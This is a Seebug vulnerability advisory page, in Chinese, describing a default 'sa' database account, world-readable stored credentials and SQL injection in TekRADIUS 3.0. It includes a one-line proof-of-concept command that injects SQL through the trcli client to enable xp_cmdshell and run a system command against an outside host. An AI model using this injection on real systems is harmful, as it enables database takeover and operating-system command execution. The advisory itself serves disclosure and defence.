Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:11784
HistoryJul 10, 2009 - 12:00 a.m.

TekRADIUS SQL注入及不安全权限漏洞

2009-07-1000:00:00
Root
www.seebug.org
17

0.008 Low

EPSS

Percentile

81.2%

JSON

CVE(CAN) ID: CVE-2009-2357,CVE-2009-2358,CVE-2009-2359

TekRadius是一个免费的RADIUS服务器,可以支持RFC 2865和RFC 2866规范。

  1. TekRADIUS的默认配置使用sa账号与Microsoft SQL Server通讯,远程攻击者可以相对较容易的获得对数据库的特权访问。

  2. TekRADIUS将数据库凭据存储在了C:\Program Files\TekRADIUS\TekRADIUS.ini文件中。任何Windows本地用户都可以访问这个文件,读取加密了的凭据。

  3. 可通过GUI或命令行客户端管理TekRADIUS。根据设计,非特权Windows用户仅有有限的功能以防范某些更改。但如果用户在对话框或命令行中提及了恶意参数请求,就可以通过SQL注入攻击对数据库执行非授权操作。

Yasin KAPLAN TekRADIUS 3.0
厂商补丁:

Yasin KAPLAN

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.tekradius.com/


                                                C:\Program Files\TekRADIUS>trcli  -r "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell', 1; reconfigure; exec master.dbo.xp_cmdshell 'ping www.nth-dimension.org.uk'--"

Related

prion 3
cvelist 3
nvd 3
cve 3
prion
prion
Sql injection
2009-07-07 23:30:00
Design/Logic Flaw
2009-07-07 23:30:00
Default configuration
2009-07-07 23:30:00
cvelist
cvelist
CVE-2009-2358
2009-07-07 23:00:00
CVE-2009-2359
2009-07-07 23:00:00
CVE-2009-2357
2009-07-07 23:00:00
nvd
nvd
CVE-2009-2358
2009-07-07 23:30:00
CVE-2009-2357
2009-07-07 23:30:00
CVE-2009-2359
2009-07-07 23:30:00
cve
cve
CVE-2009-2358
2009-07-07 23:30:00
CVE-2009-2359
2009-07-07 23:30:00
CVE-2009-2357
2009-07-07 23:30:00

0.008 Low

EPSS

Percentile

81.2%

JSON
Related for SSV:11784
prion3cvelist3nvd3cve3